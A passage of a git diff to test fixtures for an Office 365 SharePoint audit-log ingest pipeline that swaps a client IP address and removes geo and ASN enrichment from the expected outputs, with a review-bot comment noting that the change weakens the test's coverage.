Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" + "original": 
"{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"692b339f-902e-a000-f25f-95def5f17903\",\"CreationTime\":\"2020-02-07T16:44:23\",\"EventSource\":\"SharePoint\",\"Id\":\"5b02fadb-8eac-4aff-af87-08d7abecfca3\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileModified\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" }, "o365audit": { - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CorrelationId": "692b339f-902e-a000-f25f-95def5f17903", "CreationTime": "2020-02-07T16:44:23", "EventSource": "SharePoint", 
@@ -283,10 +283,10 @@
 },
 {
 "event": {
- "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"692b339f-902e-a000-f25f-95def5f17903\",\"CreationTime\":\"2020-02-07T16:44:23\",\"EventSource\":\"SharePoint\",\"Id\":\"5b02fadb-8eac-4aff-af87-08d7abecfca3\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileModified\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}"
+ "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"692b339f-902e-a000-f25f-95def5f17903\",\"CreationTime\":\"2020-02-07T16:44:23\",\"EventSource\":\"SharePoint\",\"Id\":\"5b02fadb-8eac-4aff-af87-08d7abecfca3\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileModified\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}"
 },
 "o365audit": {
- "ClientIP": "213.97.47.133",
+ "ClientIP": "67.43.156.15",
 "CorrelationId": "692b339f-902e-a000-f25f-95def5f17903",
 "CreationTime": "2020-02-07T16:44:23",
 "EventSource": "SharePoint",
@@ -314,10 +314,10 @@
 },
 {
 "event": {
- "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"692b339f-902e-a000-f25f-95def5f17903\",\"CreationTime\":\"2020-02-07T16:44:23\",\"EventSource\":\"SharePoint\",\"Id\":\"5b02fadb-8eac-4aff-af87-08d7abecfca3\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileModified\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}"
+ "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"692b339f-902e-a000-f25f-95def5f17903\",\"CreationTime\":\"2020-02-07T16:44:23\",\"EventSource\":\"SharePoint\",\"Id\":\"5b02fadb-8eac-4aff-af87-08d7abecfca3\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileModified\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}"
 },
 "o365audit": {
- "ClientIP": "213.97.47.133",
+ "ClientIP": "67.43.156.15",
 "CorrelationId": "692b339f-902e-a000-f25f-95def5f17903",
 "CreationTime": "2020-02-07T16:44:23",
 "EventSource": "SharePoint",
diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-sharepointfileop-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-sharepointfileop-events.json-expected.json
index 7b0ec795c0a..b6cf244dbcf 100644
--- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-sharepointfileop-events.json-expected.json
+++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-sharepointfileop-events.json-expected.json
@@ -2,25 +2,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "213.97.47.133"
+ "ip": "67.43.156.15"
 },
 "url": {
 "original": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 11.30.48.png"
@@ -63,7 +45,7 @@
 "asr"
 ],
 "ip": [
- "213.97.47.133"
+ "67.43.156.15"
 ]
 },
 "organization": {
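Review bot: The new-side expectation in the first hunk keeps only `source.ip` and removes `source.geo` and `source.as` outright, so this test no longer asserts that the pipeline's geoip and ASN enrichment runs at all; the same removal recurs in the `-N,25 +M,7` hunks at old lines 118, 234, 350, 466, 583, 699, 815, 932 and 1048. The replacement address 67.43.156.15 comes from the documented test ranges, which the test GeoIP database is normally able to resolve, so the expected file would be expected to carry the enrichment for the new address rather than none. If the blocks vanished because the stack used for regeneration had no GeoIP databases available, the file should be regenerated with them present so the enrichment stays pinned; if dropping geo/AS coverage is intentional, the changelog entry should say so. The `event.ingested` values also changed with regeneration, which is expected only if the package's pipeline test config already lists that field as dynamic.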
@@ -75,12 +57,12 @@
 "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"
 },
 "client": {
- "address": "213.97.47.133",
- "ip": "213.97.47.133"
+ "address": "67.43.156.15",
+ "ip": "67.43.156.15"
 },
 "event": {
- "ingested": "2021-06-17T07:32:54.703781Z",
- "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"652b339f-908c-a000-f25f-91423da7dd9b\",\"CreationTime\":\"2020-02-07T16:44:07\",\"EventSource\":\"SharePoint\",\"Id\":\"ec04aa09-0a43-4879-cdc8-08d7abecf327\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"4803608a-df7d-4f63-aa73-67aa33bb576e\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 11.30.48.png\",\"Operation\":\"FileDeleted\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot 2020-01-27 at 11.30.48.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}",
+ "ingested": "2021-12-09T13:42:46.865144800Z",
+ "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"652b339f-908c-a000-f25f-91423da7dd9b\",\"CreationTime\":\"2020-02-07T16:44:07\",\"EventSource\":\"SharePoint\",\"Id\":\"ec04aa09-0a43-4879-cdc8-08d7abecf327\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"4803608a-df7d-4f63-aa73-67aa33bb576e\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 11.30.48.png\",\"Operation\":\"FileDeleted\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot 2020-01-27 at 11.30.48.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}",
 "code": "SharePointFileOperation",
 "provider": "OneDrive",
 "kind": "event",
@@ -118,25 +100,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "213.97.47.133"
+ "ip": "67.43.156.15"
 },
 "url": {
 "original": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 11.30.48.png"
@@ -179,7 +143,7 @@
 "asr"
 ],
 "ip": [
- "213.97.47.133"
+ "67.43.156.15"
 ]
 },
 "organization": {
@@ -191,12 +155,12 @@
 "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"
 },
 "client": {
- "address": "213.97.47.133",
- "ip": "213.97.47.133"
+ "address": "67.43.156.15",
+ "ip": "67.43.156.15"
 },
 "event": {
- "ingested": "2021-06-17T07:32:54.703788100Z",
- "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"652b339f-908c-a000-f25f-91423da7dd9b\",\"CreationTime\":\"2020-02-07T16:44:07\",\"EventSource\":\"SharePoint\",\"Id\":\"ec04aa09-0a43-4879-cdc8-08d7abecf327\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"4803608a-df7d-4f63-aa73-67aa33bb576e\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 11.30.48.png\",\"Operation\":\"FileDeleted\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot 2020-01-27 at 11.30.48.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}",
+ "ingested": "2021-12-09T13:42:46.865153400Z",
+ "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"652b339f-908c-a000-f25f-91423da7dd9b\",\"CreationTime\":\"2020-02-07T16:44:07\",\"EventSource\":\"SharePoint\",\"Id\":\"ec04aa09-0a43-4879-cdc8-08d7abecf327\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"4803608a-df7d-4f63-aa73-67aa33bb576e\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 11.30.48.png\",\"Operation\":\"FileDeleted\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot 2020-01-27 at 11.30.48.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}",
 "code": "SharePointFileOperation",
 "provider": "OneDrive",
 "kind": "event",
@@ -234,25 +198,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "213.97.47.133"
+ "ip": "67.43.156.15"
 },
 "url": {
 "original": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Forms/All.aspx"
@@ -295,7 +241,7 @@
 "asr"
 ],
 "ip": [
- "213.97.47.133"
+ "67.43.156.15"
 ]
 },
 "organization": {
@@ -307,12 +253,12 @@
 "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"
 },
 "client": {
- "address": "213.97.47.133",
- "ip": "213.97.47.133"
+ "address": "67.43.156.15",
+ "ip": "67.43.156.15"
 },
 "event": {
- "ingested": "2021-06-17T07:32:54.703790100Z",
- "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"652b339f-90a0-a000-f25f-919afc141eb1\",\"CreationTime\":\"2020-02-07T16:44:08\",\"EventSource\":\"SharePoint\",\"Id\":\"25b08f04-48ee-4755-ce22-08d7abecf3a9\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"ff3631c1-6189-45c7-ad45-c15cea9e9255\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Forms/All.aspx\",\"Operation\":\"FileAccessed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"aspx\",\"SourceFileName\":\"All.aspx\",\"SourceRelativeUrl\":\"Documents/Forms\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}",
+ "ingested": "2021-12-09T13:42:46.865159200Z",
+ "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"652b339f-90a0-a000-f25f-919afc141eb1\",\"CreationTime\":\"2020-02-07T16:44:08\",\"EventSource\":\"SharePoint\",\"Id\":\"25b08f04-48ee-4755-ce22-08d7abecf3a9\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"ff3631c1-6189-45c7-ad45-c15cea9e9255\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Forms/All.aspx\",\"Operation\":\"FileAccessed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"aspx\",\"SourceFileName\":\"All.aspx\",\"SourceRelativeUrl\":\"Documents/Forms\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}",
 "code": "SharePointFileOperation",
 "provider": "OneDrive",
 "kind": "event",
@@ -350,25 +296,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "213.97.47.133"
+ "ip": "67.43.156.15"
 },
 "url": {
 "original": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Forms/All.aspx"
@@ -411,7 +339,7 @@
 "asr"
 ],
 "ip": [
- "213.97.47.133"
+ "67.43.156.15"
 ]
 },
 "organization": {
@@ -423,12 +351,12 @@
 "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"
 },
 "client": {
- "address": "213.97.47.133",
- "ip": "213.97.47.133"
+ "address": "67.43.156.15",
+ "ip": "67.43.156.15"
 },
 "event": {
- "ingested": "2021-06-17T07:32:54.703792400Z",
- "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"652b339f-90a0-a000-f25f-919afc141eb1\",\"CreationTime\":\"2020-02-07T16:44:08\",\"EventSource\":\"SharePoint\",\"Id\":\"25b08f04-48ee-4755-ce22-08d7abecf3a9\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"ff3631c1-6189-45c7-ad45-c15cea9e9255\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Forms/All.aspx\",\"Operation\":\"FileAccessed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"aspx\",\"SourceFileName\":\"All.aspx\",\"SourceRelativeUrl\":\"Documents/Forms\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}",
+ "ingested": "2021-12-09T13:42:46.865163100Z",
+ "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"652b339f-90a0-a000-f25f-919afc141eb1\",\"CreationTime\":\"2020-02-07T16:44:08\",\"EventSource\":\"SharePoint\",\"Id\":\"25b08f04-48ee-4755-ce22-08d7abecf3a9\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"ff3631c1-6189-45c7-ad45-c15cea9e9255\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Forms/All.aspx\",\"Operation\":\"FileAccessed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"aspx\",\"SourceFileName\":\"All.aspx\",\"SourceRelativeUrl\":\"Documents/Forms\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}",
 "code": "SharePointFileOperation",
 "provider": "OneDrive",
 "kind": "event",
@@ -466,25 +394,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "213.97.47.133"
+ "ip": "67.43.156.15"
 },
 "url": {
 "original": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png"
@@ -528,7 +438,7 @@
 "asr"
 ],
 "ip": [
- "213.97.47.133"
+ "67.43.156.15"
 ]
 },
 "organization": {
@@ -540,12 +450,12 @@
 "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"
 },
 "client": {
- "address": "213.97.47.133",
- "ip": "213.97.47.133"
+ "address": "67.43.156.15",
+ "ip": "67.43.156.15"
 },
 "event": {
- "ingested": "2021-06-17T07:32:54.703794400Z",
- "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"692b339f-c016-a000-f25f-990a07b2e011\",\"CreationTime\":\"2020-02-07T16:44:21\",\"EventSource\":\"SharePoint\",\"Id\":\"dac93a9f-f2fb-4cac-d18f-08d7abecfbb6\",\"ImplicitShare\":\"No\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileUploaded\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}",
+ "ingested": "2021-12-09T13:42:46.865167600Z",
+ "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"692b339f-c016-a000-f25f-990a07b2e011\",\"CreationTime\":\"2020-02-07T16:44:21\",\"EventSource\":\"SharePoint\",\"Id\":\"dac93a9f-f2fb-4cac-d18f-08d7abecfbb6\",\"ImplicitShare\":\"No\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileUploaded\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}",
 "code": "SharePointFileOperation",
 "provider": "OneDrive",
 "kind": "event",
